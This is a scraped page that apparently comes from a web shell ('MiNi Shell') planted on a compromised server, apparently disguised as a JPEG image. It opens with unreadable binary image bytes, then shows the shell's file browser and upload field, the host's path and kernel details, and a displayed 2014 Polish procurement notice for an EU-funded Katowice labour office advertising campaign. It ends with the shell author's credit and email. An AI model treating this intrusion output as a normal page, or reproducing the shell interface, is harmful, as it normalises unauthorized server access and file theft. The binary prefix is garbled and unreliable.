JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141008/212557-N-2014.html

<p class="kh_header"><b>Katowice: PRZYGOTOWANIE I REALIZACJA KAMPANII REKLAMOWEJ NA NOŚNIKACH WIELKOFORMATOWYCH TYPU CITYLIGHT ORAZ NA PORTALACH INTERNETOWYCH I W ŚRODKACH KOMUNIKACJI PUBLICZNEJ</b><br>
<b>Numer ogłoszenia: 212557 - 2014; data zamieszczenia: 08.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy , ul. Kościuszki 30, 40-048 Katowice, woj. śląskie, tel. 0 32 757 33 61.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wup-katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu wojewódzctwa nieposiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZYGOTOWANIE I REALIZACJA KAMPANII REKLAMOWEJ NA NOŚNIKACH WIELKOFORMATOWYCH TYPU CITYLIGHT ORAZ NA PORTALACH INTERNETOWYCH I W ŚRODKACH KOMUNIKACJI PUBLICZNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest przygotowanie i realizację kampanii reklamowej na nośnikach wielkoformatowych typu citylight oraz na portalach internetowych i w środkach komunikacji publicznej, której celem jest promocja efektów działań dotyczących Europejskiego Funduszu Społecznego w aspekcie zadań Wojewódzkiego Urzędu Pracy w Katowicach w perspektywie finansowej 2007-2013 Programu Operacyjnego Kapitał Ludzki
2.  Szczegółowy opis przedmiotu zamówienia:
2.1. Opis części zamówienia: 
2.1 REKLAMA NA NOŚNIKACH CITYLIGHT
	Nośnik wolnostojący lub naścienny (może być podświetlany) o formacie ekspozycji: 120 cm    x  180 cm (+ - 10% każdy wymiar), zlokalizowany w miastach województwa śląskiego - w ich najbardziej atrakcyjnych, najbardziej ruchliwych miejscach np. (pasaże handlowe, deptaki, dworce kolejowe, również jako element wiaty przystankowej, obudowy przejść podziemnych)
	Liczba nośników: 90 sztuk
	Czas  ekspozycji:  nieprzerwanie 4 tygodnie w terminie 17.11.2014 r. - 15.12.2014 r.
	Wykonawca zapewnia ekspozycję 1 wzoru plakatów 
	Nośniki zlokalizowane w miastach województwa śląskiego, w tym minimum jeden nośnik w co najmniej dziesięciu różnych miastach województwa.

	Przed publiczną ekspozycją citylightów Wykonawca dostarczy Zamawiającemu wydrukowane plakaty w rozmiarze 84 x 59 cm (do tzw. potykaczy) w ilości 4 sztuk

	W cenie należy uwzględnić: najem nośnika, koszt zaprojektowania i wydruku plakatów, montaż plakatów oraz ich demontaż po zakończonej kampanii, inne koszty związane z realizacją opisanego zamówienia.
	Warunkiem zapłaty za wykonaną usługę jest dostarczenie Zamawiającemu:
a)	papierowej wersji podpisanego przez Wnioskodawcę zestawienia eksponowanych citilightów, z wyszczególnieniem dokładnej lokalizacji każdego z nich i czasu ekspozycji,
b)	zapisanych na płycie DVD-CD zdjęć każdego z eksponowanych citylightów wykonanych w takim miejscu, aby możliwa była jednoznaczna identyfikacja w terenie każdego z citylightów.
	Plakaty zawierać będą kod QR z danymi teleadresowymi Wojewódzkiego Urzędu Pracy 
w Katowicach, adres strony internetowej: efs.wup-katowice.pl lub odnośnikiem do innych danych ze strony WUP - do uzgodnienia z Zamawiającym na etapie projektowania plakatów. 
	Wykonawca musi dysponować zbiorami zdjęć i grafik możliwymi do wykorzystania podczas projektowania wszystkich form graficznych.
	W  dniu podpisania umowy Wykonawca przedstawi Zamawiającemu:
a)	podział nośników na poszczególne miasta województwa śląskiego,

b)	propozycje punktów, w których zlokalizowane będą nośniki (np. ulica, przystanek, przejście podziemne, ściana budynku).

2.2	REKLAMA NA PORTALACH INTERNETOWYCH

2.2.1	Nośniki elektroniczne - typu billboard (double billboard) oraz  boks śródtekstowy
 
	Formy ekspozycji :

a)	Billboard (double billboard) przynajmniej 750 na 200 pikseli. Animowany nośnik reklamowy wykonany w technologii flash (zaprojektowanie i wykonanie nośnika uwzględnione w cenie usługi), znajdujący się na górze strony, wycentrowany pod nagłówkiem strony. Nośnik pojawiający się w głównych zakładkach tematycznych portalu (ograniczonych w grupie informacji z zakresu: wiadomości, sport, biznes, motoryzacja, kobieta, mężczyzna, pogoda, podróże, turystyka, kultura, gospodarka, edukacja), na stronie głównej oraz/lub innych atrakcyjnych, najczęściej odwiedzanych (pod względem liczby wejść) zakładkach portalu. Zakładki tematyczne do akceptacji przez Zamawiającego.
b)	Boks śródtekstowy przynajmniej 300 na 250 pikseli. Animowany nośnik reklamowy wykonany w technologii flash (zaprojektowanie i wykonanie nośnika uwzględnione 
w cenie usługi), znajdujący się w środku artykułu lub w prawej kolumnie strony. Nośnik pojawiający się w głównych zakładkach tematycznych portalu (ograniczone 
w grupie informacji z zakresu np. wiadomości, sport, biznes, motoryzacja, kobieta, mężczyzna, pogoda, podróże, turystyka, kultura, gospodarka, edukacja) na stronie głównej oraz-lub innych atrakcyjnych, najczęściej odwiedzanych (pod względem ilości wejść) zakładkach portalu. Zakładki tematyczne do akceptacji przez Zamawiającego.
	Kliknięcie na nośniki musi powodować automatyczne przekierowanie użytkownika 
na tematyczną podstronę internetową podaną podczas realizacji zamówienia.
	Emisja na dwóch informacyjnych portalach internetowych o zasięgu min. krajowym, których tematyka gwarantuje ich liczne odwiedzanie przez mieszkańców województwa śląskiego; portal musi znajdować się wśród pierwszych dziesięciu portali w aktualnym rankingu ( maj 2014) Megapanel PBI-Gemius w kategorii informacje i publicystyka, uszeregowanych malejąco według wartości odsłony krajowe ogółem. Billboard powinien pojawiać się w głównych zakładkach tematycznych każdego z portali (ograniczonych do informacji z zakresu: sport, biznes, moto, kobieta, mężczyzna, pogoda, podróże, turystyka, kultura, gospodarka, edukacja) na stronie głównej oraz-lub innych atrakcyjnych, najczęściej odwiedzanych zakładkach portalu; zakładki tematyczne każdorazowo do akceptacji przez zamawiającego.
	Ekspozycja billboardów oraz boksów śródtekstowych targetowana geograficznie 
do użytkowników Internetu zamieszkujących obszar województwa śląskiego (na podstawie adresów IP)  
	Emitowany będzie jeden wzór boksu śródtekstowego i  jeden wzór billboardu
	Czas nieprzerwanej ekspozycji każdego nośnika uzależniony od liczby odsłon na portalu, jednak nie dłuższy niż cztery tygodnie  w terminie  od 17.11-15.12.2014r. Podział czasowy do akceptacji Zamawiającego.
	Oferta na przygotowanie i realizację kampanii reklamowej zawierać musi informację o portalach, na których Wykonawca zamierza przeprowadzić kampanię.
2.2.2     Nośnik elektroniczny - List reklamowy
	Wielkość listu minimum 40 kb. Nośnik wykonany w technologii html (projekt wykonania listu uwzględniony w cenie usługi - treść przekazana przez Zamawiającego).
	List reklamowy musi zostać wysłany na skrzynki mailowe użytkowników bezpłatnych kont pocztowych w ramach tych samych portali internetowych, na których zamieszczono billboardy oraz boksy śródtekstowe (jako uzupełnienie powyższej kampanii). Użytkownik poczty musi być mieszkańcem województwa śląskiego w grupie wiekowej 18-64 (identyfikacja na podstawie informacji podanych przez użytkownika podczas rejestracji konta).
	List reklamowy może być dostarczony podczas kampanii tylko raz do danego konta e-mailowego.
	Wysyłany będzie jeden wzór listu
	Wykonawca zapewnia wysyłkę listów w proporcjonalnej liczbie na 2 portalach informacyjnych tzn. po 200 000 wysyłek na każdym z portali, łącznie 400 000
	Kliknięcie na odnośnik w liście musi powodować automatyczne przekierowanie użytkownika na tematyczną podstronę internetową podaną przez Zamawiającego podczas realizacji zamówienia.

2.2.3        Uwagi ogólne do nośników elektronicznych:
	Wykonawca zapewni równomierne rozmieszczenie reklam na 2 portalach informacyjnych tzn.
- Billboard -double billboard) (po 150 000  odsłon na każdym z portali, łącznie 300 000)
- Boks śródtekstowy (po 150 000 odsłon na każdym z portali, łącznie 300 000)
- List reklamowy mailling  po 200 000 wysyłek na każdym z portali, łącznie 400 000
	Termin emisji billboardów i boksów śródtekstowych oraz wysyłki listów reklamowych ustalony zostanie między Zamawiającym i Wykonawcą na min. 7 dni kalendarzowych przed emisją-wysyłką.
	Kampania na portalu zintegrowana czasowo z wysyłką listów reklamowych.
	Obowiązkowe dostarczenie przez Wykonawcę statystyk podsumowujących po zakończeniu każdego etapu kampanii. Statystyki muszą być dostarczone w wersji elektronicznej oraz papierowej, podpisanej przez Wykonawcę. Statystyki mają zawierać przynajmniej informację 
o liczbach wejść (kliknięć) użytkowników z województwa śląskiego oglądających reklamę 
na portalu podczas trwania kampanii oraz o liczbie wysłanych listów reklamowych do użytkowników poczty e-mail z terenu województwa śląskiego.
Przedstawienie podpisanych statystyk w wersji papierowej jest podstawą do stwierdzenia wykonania usługi i zapłaty za nią.
2.3	REKLAMA W KOMUNIKACJ MIEJSKIEJ 

2.3.1	Plakaty wewnątrz komunikacji miejskiej

Przygotowanie, wykonanie i ekspozycja plakatów wewnątrz pojazdów komunikacji publicznej kursujących na obszarze województwa śląskiego 
	Miejsce ekspozycji plakatów:
W autobusach i-lub tramwajach i-lub trolejbusach komunikacji publicznej kursujących 
w co najmniej 3 różnych miastach województwa śląskiego; ostateczna lokalizacja 
do akceptacji Zamawiającego.
	Plakaty eksponowane będą w 250 autobusach i-lub trolejbusach i-lub tramwajach przez cały okres trwania kampanii.
	Rodzaj i format reklam: 
- plakat A4 lub A3 (w zależności od standardu wielkości plakatu umieszczanego 
w pojeździe, który obowiązuje u danego operatora), 
- papier błyszczący,
- gramatura papieru co najmniej 130 g,
- plakaty w pełnym kolorze (4+0)
	Liczba plakatów - łącznie 250. Ostateczna liczba reklam w każdej z lokalizacji i ich podział na środki komunikacji (autobus, tramwaj, trolejbus) do akceptacji Zamawiającego.
	Plakaty zawierać będą kod QR z danymi teleadresowymi Wojewódzkiego Urzędu Pracy 
w Katowicach, adres strony internetowej: efs.wup-katowice.pl lub odnośnikiem do innych danych ze strony WUP - do uzgodnienia z Zamawiającym na etapie projektowania plakatów.
	Łącznie eksponowany będzie 1 rodzaj tematyczny plakatu.
	W dniu podpisania umowy Wykonawca zobowiązany jest do przedstawienia podziału wytypowanych zajezdni obsługujących poszczególne miasta. 
	Każdy plakat będzie eksponowany wewnątrz danego środka komunikacji publicznej. Nie dopuszcza się eksponowania w tym samym pojeździe więcej niż jednego plakatu.
	Plakaty eksponowane w odpowiedniej ramce zainstalowanej wewnątrz autobusu, tramwaju, trolejbusu lub przyklejone folią pokrywająca powierzchnię całego plakatu.
	Plakaty umieszczone w miejscu dobrze widocznym dla pasażerów znajdujących się wewnątrz danego środka komunikacji publicznej.
	Okres ekspozycji reklamy wewnętrznej nieprzerwanie od 17.11.2014 r. do 15.12.2014 r.
	Usługa obejmie również montaż i demontaż plakatów oraz bieżący serwis podczas trwania kampanii.
	Wykonawca musi dysponować zbiorami zdjęć i grafik możliwych do wykorzystania podczas projektowania plakatów. 
	Wykonawca dostarczy do siedziby Zamawiającego 4 plakaty po zrealizowanej kampanii. 
	Warunkiem zapłaty za wykonaną usługę jest dostarczenie Zamawiającemu 
po zakończeniu kampanii:
a)	papierowej wersji podpisanego przez Wykonawcę zestawienia wyeksponowanych plakatów w każdej z lokalizacji (konkretne pojazdy oznaczone numerami bocznymi, 
ze wskazaniem miast, na obszarze których pojazd kursował);
b)	zapisanych na płycie DVD-CD zdjęć każdego z wyeksponowanych plakatów wykonanych w takim miejscu, aby możliwa była ich jednoznaczna identyfikacja (konkretne pojazdy oznaczone numerami bocznymi)
c)	pisemnych oświadczeń przedsiębiorstw komunikacyjnych, w treści których musi znajdować się informacja na temat:
- faktycznej ekspozycji plakatów w środku komunikacji danego przedsiębiorstwa; 
- liczba autobusów lub trolejbusów lub tramwajów, w których zostały umieszczone plakaty;
- numery linii ww. pojazdów.
Oświadczenia muszą być przedstawione w oryginale.
2.3.2	Reklama  Fullback (cały tył autobusu)
	druk, miesięczna ekspozycja, montaż i demontaż reklam w autobusach komunikacji miejskiej  w postaci oklejenia 70 autobusów w wersji fullback - busback (cały tył autobusu) kursujących na terenie wszystkich miast województwa śląskiego.

Wspólne wymagania dla wszystkich form reklamy:
	czas ekspozycji - emisji:  17.11.2014r. do 15.12.2014r. 
	kampania w internecie oraz na citylightach i w środkach komunikacji publicznej zsynchronizowana czasowo. 
	wykonanie projektów graficznych, koszt nabycia praw do wszystkich materiałów wykorzystanych w projekcie  przez Wykonawcę, musi być uwzględniony w cenie usługi
	wydruk plakatów (citylighty i kom.publiczna) uwzględniony w cenie usługi.
	projekt graficzny powinien być spójny dla wszystkich form reklamy, projekty powinny korespondować ze sobą wizualnie (zawierać pokrewne elementy, ale nie mogą być identyczne, dopuszcza się jednak możliwość, że Zamawiający zdecyduje, aby projekt był jednakowy dla wszystkich form reklamy).
	Wykonawca dostarczy minimum 3 propozycje graficzne dla każdego nośnika reklamy (wymienionego  w pkt. 2.1, 2.2, 2.3) do akceptacji Zamawiającemu w terminie 14 dni roboczych od dnia podpisania umowy.
	wszystkie projekty graficzne muszą być opatrzone logotypami Programu Operacyjnego Kapitał Ludzki, Śląskie. Pozytywna energia, flagą UE z podpisem Unia Europejska Europejski Fundusz Społeczny, informacją o współfinansowaniu przez Unię Europejską ze środków Europejskiego Funduszu Społecznego oraz dane teleadresowe wraz  z adresem strony internetowej Wojewódzkiego Urzędu Pracy. Oznaczenie publikacji zastosowane zgodnie z aktualnym dokumentem Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki.
	Wykonawca musi dysponować zbiorami zdjęć i grafik możliwymi do wykorzystania podczas projektowania wszystkich form graficznych. W cenie należy również uwzględnić możliwość realizacji sesji fotograficznej na terenie województwa śląskiego, z której zdjęcia zostaną wykorzystane do opracowania projektów form graficznych.
	Wykonawca przekazuje Zamawiającemu prawa do nieograniczonego dysponowania użytymi w materiałach formami graficznymi (layoutami), udzielając tym samym bezterminowej licencji do ich wykorzystania na wszystkich polach eksploatacji. Przekaże również layouty 
w formacie .cdr (wersja programu 12) lub .ai (wersja programu SC3). Wykonawca przekaże również wersję edytowalną projektów graficznych (pliki źródłowe), które umożliwią Zamawiającemu adaptację projektu do innych formatów reklamy. Zamawiający dokona jedynie niezbędnych, technicznych zmian w projekcie, nie naruszając tym samym istoty pierwotnego projektu graficznego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku, jeżeli Wykonawca wykaże, 
iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie co najmniej 1 usługę o wartości nie mniejszej niż 137 000,00 zł, której przedmiotem zamówienia była realizacja co najmniej 1 kampanii promocyjnej  o zasięgu regionalnym, polegającej na promocji na nośnikach zewnętrznych citylight, lub-i środkach transportu publicznego lub-i na portalach internetowych.

Opis sposobu dokonywania oceny spełnienia tego warunku:
Zamawiający dokona oceny spełnienia ww warunku według formuły spełnia-nie spełnia na podstawie załączonego do oferty wykazu zawierającego usługi wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert bądź wykonywaną nadal, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadającą ww przedmiotowi zamówienia, z podaniem nazwy jednostki, dla której była lub jest świadczona, datą jej realizacji, przedmiotem, wartości oraz załączeniem dowodów, czy usługi wymienione w wykazie zostały wykonane lub są wykonywane należycie. 

Dowody potwierdzające należyte wykonanie powinny zostać przedstawione w formie oryginału lub czytelnej kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną do występowania w imieniu Wykonawcy.

Niewykazanie spełnienia ww warunku skutkować będzie wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 pkt 4 ustawy Pzp.

Wykonawca może polegać na wiedzy i doświadczeniu, innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w  takiej sytuacji  zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, w sytuacjach, w których uprawnienie do występowania w imieniu Wykonawcy nie wynika z przedłożonego dokumentu wyszczególnionego w punkcie III.4.2) pkt 2. W przypadku złożenia kserokopii pełnomocnictwo musi być potwierdzone za zgodność z oryginałem przez Wykonawcę lub osobę upoważnioną.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://wup.katowice.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 608- Zespół ds. Zamówień Publicznych, VI piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.10.2014 godzina 11:00, miejsce: Wojewódzki Urząd Pracy w Katowicach,  
ul. Kościuszki 30 , pok. 210- Kancelaria Urzędu, II piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa współfinansowana przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com